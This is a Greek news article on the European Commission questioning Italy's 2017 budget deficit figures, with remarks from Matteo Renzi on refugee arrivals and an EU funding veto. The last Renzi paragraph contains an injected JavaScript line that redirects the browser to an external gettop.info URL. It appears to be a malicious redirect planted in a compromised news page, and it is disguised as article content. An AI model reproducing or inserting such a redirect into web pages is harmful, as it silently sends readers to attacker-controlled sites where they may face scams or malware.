«Αγρίεψε» η Κομισιόν για τους προϋπολογισμούς

0
8

 

Η Ευρωπαϊκή Επιτροπή κάλεσε την κυβέρνηση της Ιταλίας να εξηγήσει γιατί το λεγόμενο διαρθρωτικό έλλειμμά της αυξάνεται αντί να μειώνεται, όπως είχαν ζητήσει οι υπουργοί Οικονομικών της ΕΕ, και γιατί το ονομαστικό δημοσιονομικό έλλειμμα είναι αρκετά υψηλότερο από εκείνο που υποσχόταν η Ρώμη τον Μάιο.

Η επιστολή της Κομισιόν προς τον υπουργό Οικονομικών της Ιταλίας Πιερ Κάρλο Πάντοαν εντάσσεται στις ευθύνες της να ελέγχει τους προϋπολογισμούς των κρατών μελών της ευρωζώνης και να αποφαίνεται εάν τηρούν το ευρωπαϊκό δίκαιο.

Η Ιταλία, όπως και όλες οι άλλες χώρες της ευρωζώνης, είναι υποχρεωμένη να μειώνει το διαρθρωτικό έλλειμμά της –από το οποίο εξαιρούνται τυχόν εφάπαξ δαπάνες και οι επιπτώσεις του οικονομικού κύκλου– κατά 0,5% του ΑΕΠ σε ετήσια βάση ωσότου επιτύχει ισοσκέλιση ή πλεόνασμα.

Όμως στο προσχέδιο του προϋπολογισμού της Ιταλίας για το 2017 το διαρθρωτικό έλλειμμα αναφέρεται ότι θα αυξηθεί κατά 0,4% του ΑΕΠ στο 1,6%, αντί να μειωθεί κατά 0,6% στο 0,6% του ΑΕΠ, όπως είχαν ζητήσει οι υπουργοί Οικονομικών τον Ιούλιο.

Τον Μάιο η κυβέρνηση της Ιταλίας υποσχόταν σε επιστολή της προς την Κομισιόν ότι το ονομαστικό της έλλειμμα το 2017 θα ανερχόταν στο 1,8% από 2,4% που αναμένεται να καταγράψει φέτος. Οι προβλέψεις του ιταλικού κρατικού προϋπολογισμού που υπεβλήθη στην Ευρωπαϊκή Επιτροπή όμως κάνουν λόγο περί ενός ελλείμματος 2,3%.

«Θα επιθυμούσαμε να δοθούν εξηγήσεις για αυτή την αναθεώρηση των στόχων και το σημαντικό κενό που προκύπτει όσον αφορά τις δεσμεύσεις που είχαν γίνει την άνοιξη», αναφέρεται στην επιστολή της Ευρωπαϊκής Επιτροπής.

Η Κομισιόν, η οποία έστειλε επίσης επιστολές με τις οποίες ζητεί διευκρινίσεις για τους προϋπολογισμούς τους στις κυβερνήσεις της Ισπανίας, της Πορτογαλίας, της Κύπρου, της Φινλανδίας και της Λιθουανίας, διαβεβαιώνει πως αντιλαμβάνεται την έκτακτη φύση των δαπανών που αναγκάστηκε να κάνει η Ρώμη εξαιτίας των πρόσφατων καταστροφικών σεισμών και των μεταναστευτικών ροών, αλλά πρόσθεσε ότι χρειάζεται περισσότερες λεπτομέρειες.

Στην αντεπίθεση ο Ρέντσι

Ο Ματέο Ρέντσι προειδοποίησε ότι η Ιταλία δεν μπορεί να αντέξει άλλη μία χρονιά με τις ίδιες αφίξεις προσφύγων, καλώντας τις άλλες ευρωπαϊκές χώρες να κάνουν περισσότερα σε αυτό το ζήτημα.

Σε συνέντευξή του στη RAI, ο Ιταλός πρωθυπουργός επανέλαβε τον απειλή να ασκήσει βέτο στην εκταμίευση κονδυλίων της ΕΕ προς χώρες που αρνούνται να βοηθήσουν την Ιταλία και την Ελλάδα, που έχουν σηκώσει το μεγαλύτερο βάρος της προσφυγικής κρίσης. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here